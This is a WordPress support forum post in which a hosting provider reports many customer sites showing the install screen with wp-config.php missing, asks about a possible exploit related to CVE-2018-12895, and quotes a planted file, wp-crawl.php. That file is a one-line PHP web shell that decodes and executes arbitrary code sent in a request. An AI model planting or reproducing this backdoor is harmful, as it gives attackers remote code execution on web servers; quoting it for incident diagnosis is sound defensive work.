The last couple of hours, our support has been targeted with A LOT of emails that all revolve around the same issue; a customer’s WordPress website suddenly displays the installation process.
It all seems very related to CVE-2018-12895, but this should’ve been fixed in 4.9.7, and we have customers affected by this that runs the latest version of WordPress.
We’ve had multiple reports the entire day, across multiple hosting companies in multiple datacenters with very different setups.
Is there an exploit I don’t know about?
For all infected versions, we see a file called wp-crawl.php in the WP-root. Contents:
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>
- The topic ‘wp-config.php goes missing – for a lot of customers’ is closed to new replies.